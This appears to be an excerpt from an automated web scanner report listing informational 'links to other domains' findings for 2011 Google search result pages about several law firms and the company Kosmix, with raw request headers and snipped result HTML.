...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/contactus/xprContactUs1.aspx?xpST=ContactUs" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBDAA')">Contact</a></div><div class=sld><a class=sla href="http://www.beneschlaw.com/services/xprServiceListBFCA.aspx?xpST=PracticeIndustryList" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBTAA')">Practice &amp; Industry Groups</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/agoldner/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoBjAA')">Allan Goldner</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.beneschlaw.com/aboutus/xprGeneralContent2.aspx?xpST=AboutUsDiversity" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBzAA')">Diversity</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQoAIwAQ')" title="Benesch Friedlander Coplan &amp;amp; Aronoff" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQoAIwAQ')" title="Benesch Friedlander Coplan &amp;amp; Aronoff"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDMQoAIwAg')" title="Benesch Friedlander Coplan &amp;amp; Aronoff LLP" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.beneschlaw.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDMQoAIwAg')" title="Benesch Friedlander Coplan &amp;amp; Aronoff LLP"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx?xpST=ProfessionalSearch" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Attorneys Search | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ki56z_JzBIoJ:www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx%3FxpST%3DProfessionalSearch+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ki56z_JzBIoJ:www.beneschlaw.com/professionals/xprProfessionalSearch3.aspx%3FxpST%3DProfessionalSearch+Benesch+Friedlander+Coplan+%26+Aronoff&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=2377286" class=l onmousedown="return clk(this.href,'','','','5','','0CEUQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RUUlMdQ1p6EJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2377286+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:RUUlMdQ1p6EJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2377286+Benesch+Friedlander+Coplan+%26+Aronoff&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:41OsrPGt4C0J:www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:41OsrPGt4C0J:www.martindale.com/Benesch-Friedlander-Coplan-Aronoff/law-firm-1152168.htm+Benesch+Friedlander+Coplan+%26+Aronoff&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')">TopWorkplaces - Profile for &quot;<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6R0HGX921dEJ:www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:6R0HGX921dEJ:www.topworkplaces.com/company_survey/benesch-friedlander-coplan-aro_cleveland/cleveland_10+Benesch+Friedlander+Coplan+%26+Aronoff&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.terralex.org/profile.aspx?IEntityId=mm1000108209&amp;LocationId=1000108209" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')">TerraLex - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6W5r763LijIJ:www.terralex.org/profile.aspx%3FIEntityId%3Dmm1000108209%26LocationId%3D1000108209+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:6W5r763LijIJ:www.terralex.org/profile.aspx%3FIEntityId%3Dmm1000108209%26LocationId%3D1000108209+Benesch+Friedlander+Coplan+%26+Aronoff&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CF8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html" class=l onmousedown="return clk(this.href,'','','','9','','0CGAQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4qGvaRU9KV4J:www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:4qGvaRU9KV4J:www.superlawyers.com/ohio/lawfirm/Benesch-Friedlander-Coplan-and-Aronoff-LLP/0341390d-c245-481b-9113-b050be971ba9.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGUQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bfcalaw.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGYQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:z7gSIAGCbGEJ:www.bfcalaw.com/+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:z7gSIAGCbGEJ:www.bfcalaw.com/+Benesch+Friedlander+Coplan+%26+Aronoff&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGsQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html" class=l onmousedown="return clk(this.href,'','','','11','','0CG0QFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PxK1hD4nyEQJ:www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:PxK1hD4nyEQJ:www.lawyers.com/Ohio/Cleveland/Benesch,-Friedlander,-Coplan-and-Aronoff-LLP-1434288-f.html+Benesch+Friedlander+Coplan+%26+Aronoff&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CHQQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=XX4340" class=l onmousedown="return clk(this.href,'','','','12','','0CHYQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:aOrOfpnN068J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX4340+Benesch+Friedlander+Coplan+%26+Aronoff&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:aOrOfpnN068J:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX4340+Benesch+Friedlander+Coplan+%26+Aronoff&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','12','','0CHsQIDAL')">Cached</a>
...[SNIP]...
<div><a href="http://www.calfee.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CH4QoggwDA')">Calfee.com</a>
...[SNIP]...
<div><a href="http://www.bricker.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIABEKIIMA0')">of the Bricker</a>
...[SNIP]...
<div><a href="http://www.hahnlaw.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIIBEKIIMA4')">Hahn Loeser</a>
...[SNIP]...
<div><a href="http://www.taftlaw.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIQBEKIIMA8')">Taft, Stettinius & Hollister, LLP</a>
...[SNIP]...

19.52. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Kosmix&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:34 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76432

<!doctype html> <head> <title>Kosmix - Google Search</title> <script>window.google={kEI:"YsTLTaaXOcfJgQe-9_zrBQ",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29757,29795,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Kosmix&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kosmix.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5XrQR0LcH4UJ:www.kosmix.com/+Kosmix&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CC8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/corp/about" onmousedown="return clk(this.href,'','','','1','','0CDEQqwMoADAA')">Kosmix&#39;s about page</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/corp/team" onmousedown="return clk(this.href,'','','','1','','0CDIQqwMoATAA')">Our Team</a></div><div class=sld><a class=sla href="http://www.kosmix.com/corp/jobs" onmousedown="return clk(this.href,'','','','1','','0CDMQqwMoAjAA')">Jobs</a></div><div class=sld><a class=sla href="http://sports.kosmix.com/" onmousedown="return clk(this.href,'','','','1','','0CDQQqwMoAzAA')">Sports</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/corp/contact" onmousedown="return clk(this.href,'','','','1','','0CDUQqwMoBDAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://travel.kosmix.com/" onmousedown="return clk(this.href,'','','','1','','0CDYQqwMoBTAA')">Travel</a></div><div class=sld><a class=sla href="http://homegarden.kosmix.com/" onmousedown="return clk(this.href,'','','','1','','0CDcQqwMoBjAA')">Home &amp; Garden</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kosmix.com/browse" onmousedown="return clk(this.href,'','','','1','','0CDgQqwMoBzAA')">Browse Topics</a>
...[SNIP]...
<h3 class="r"><a href="http://blog.kosmix.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CDsQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sA4frT-hIOwJ:blog.kosmix.com/+Kosmix&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEAQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://autos.kosmix.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CEIQFjAC')">Autos on <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:c4rCe42kN5UJ:autos.kosmix.com/+Kosmix&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CEcQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Kosmix" class=l onmousedown="return clk(this.href,'','','','4','','0CEoQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:62KpRUSLeRQJ:en.wikipedia.org/wiki/Kosmix+Kosmix&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CE8QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/kosmix" class=l onmousedown="return clk(this.href,'','','','5','','0CFEQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:irDc3LnbleoJ:www.crunchbase.com/company/kosmix+Kosmix&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CFgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://dealbook.nytimes.com/2011/04/19/wal-mart-buys-social-media-site-kosmix/" class=l onmousedown="return clk(this.href,'','','','6','','0CFoQFjAF')">Wal-Mart Buys Social Media Site <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7wKfXIzgtEsJ:dealbook.nytimes.com/2011/04/19/wal-mart-buys-social-media-site-kosmix/+Kosmix&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CF8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nytimes.com/2009/03/15/business/15ping.html" class=l onmousedown="return clk(this.href,'','','','7','','0CGAQFjAG')">Ping - Just Don&#39;t Compare <em>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/kosmix" class=l onmousedown="return clk(this.href,'','','','8','','0CGgQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tX5nSTBW2XUJ:twitter.com/kosmix+Kosmix&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CG0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://blogs.wsj.com/venturecapital/2011/04/20/wal-marts-kosmix-deal-may-inspire-other-retailers/" class=l onmousedown="return clk(this.href,'','','','9','','0CG8QFjAI')">Will Wal-Mart&#39;s <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZNeyDfQVYRoJ:blogs.wsj.com/venturecapital/2011/04/20/wal-marts-kosmix-deal-may-inspire-other-retailers/+Kosmix&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CHQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.huffingtonpost.com/2011/04/18/walmart-social-media-kosmix_n_850678.html" class=l onmousedown="return clk(this.href,'','','','10','','0CHUQFjAJ')">Walmart To Buy Social Media Firm <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EE0UVfccbTUJ:www.huffingtonpost.com/2011/04/18/walmart-social-media-kosmix_n_850678.html+Kosmix&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHoQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://duckduckgo.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHwQoggwCg')">new search engine</a>
...[SNIP]...
<div><a href="http://www.hakia.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CH4QoggwCw')">Hakia</a>
...[SNIP]...
<div><a href="http://www.lexxe.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CIABEKIIMAw')">Lexxe</a>
...[SNIP]...
<div><a href="http://www.factbites.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIIBEKIIMA0')">Factbites</a>
...[SNIP]...

19.53. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=Hamilton+Brook+Smith+%26+Reynolds&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 72599

<!doctype html> <head> <title>Hamilton Brook Smith &amp; Reynolds - Google Search</title> <script>window.google={kEI:"j9DLTa2zLITy0gHFrJjeBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Hamilton+Brook+Smith+%26+Reynolds&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:n1SRhuyuN9kJ:www.hbsr.com/+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:n1SRhuyuN9kJ:www.hbsr.com/+Hamilton+Brook+Smith+%26+Reynolds&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hbsr.com/directory/search" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Directory</a></div><div class=sld><a class=sla href="http://www.hbsr.com/careers/why-hamilton-brook-smith-reynolds" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hbsr.com/contact_us/index" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.hbsr.com/about_the_firm/firm-overview" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">About The Firm</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/contact_us/index" class=l onmousedown="return clk(this.href,'','','','2','','0CCMQFjAB')">Massachusetts Intellectual Property Law Firm</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:K7i_w52GJZUJ:www.hbsr.com/contact_us/index+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:K7i_w52GJZUJ:www.hbsr.com/contact_us/index+Hamilton+Brook+Smith+%26+Reynolds&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/careers/why-hamilton-brook-smith-reynolds" class=l onmousedown="return clk(this.href,'','','','3','','0CCoQFjAC')">Boston IP Law Firm Careers, Firm Culture</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ih3XUfLqV68J:www.hbsr.com/careers/why-hamilton-brook-smith-reynolds+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ih3XUfLqV68J:www.hbsr.com/careers/why-hamilton-brook-smith-reynolds+Hamilton+Brook+Smith+%26+Reynolds&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hbsr.com/directory/search" class=l onmousedown="return clk(this.href,'','','','4','','0CDEQFjAD')">Directory Search</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:1lrSolJe4NkJ:www.hbsr.com/directory/search+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:1lrSolJe4NkJ:www.hbsr.com/directory/search+Hamilton+Brook+Smith+%26+Reynolds&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDYQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://boston.monster.com/Search.aspx?sid=40&amp;cy=US&amp;cnme=Concord%2C+MA&amp;q=%22Hamilton%2C+Brook%2C+Smith+%26+Reynolds%22" class=l onmousedown="return clk('http://boston.monster.com/Search.aspx?sid=40&cy=US&cnme=Concord%2C+MA&q=%22Hamilton%2C+Brook%2C+Smith+%26+Reynolds%22','','','','5','','0CDkQFjAE')">&quot;<em>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=7245327" class=l onmousedown="return clk(this.href,'','','','6','','0CD4QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DNR67kwzd0AJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D7245327+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DNR67kwzd0AJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D7245327+Hamilton+Brook+Smith+%26+Reynolds&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm" class=l onmousedown="return clk(this.href,'','','','7','','0CEQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HezKGJqTXmcJ:www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HezKGJqTXmcJ:www.glassdoor.com/Job/Hamilton-Brook-Smith-and-Reynolds-P-C-Jobs-E291946.htm+Hamilton+Brook+Smith+%26+Reynolds&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=XX3940" class=l onmousedown="return clk(this.href,'','','','8','','0CEoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vJxpJeEbg2oJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX3940+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:vJxpJeEbg2oJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DXX3940+Hamilton+Brook+Smith+%26+Reynolds&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CE8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFEQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:YgtFQJmUOvQJ:www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html+Hamilton+Brook+Smith+%26+Reynolds&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:YgtFQJmUOvQJ:www.superlawyers.com/massachusetts/lawfirm/Hamilton-Brook-Smith-and-Reynolds-PC/a4b12cde-2669-407d-8c2b-fc6966fae2f7.html+Hamilton+Brook+Smith+%26+Reynolds&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFYQIDAI')">Cached</a>
...[SNIP]...
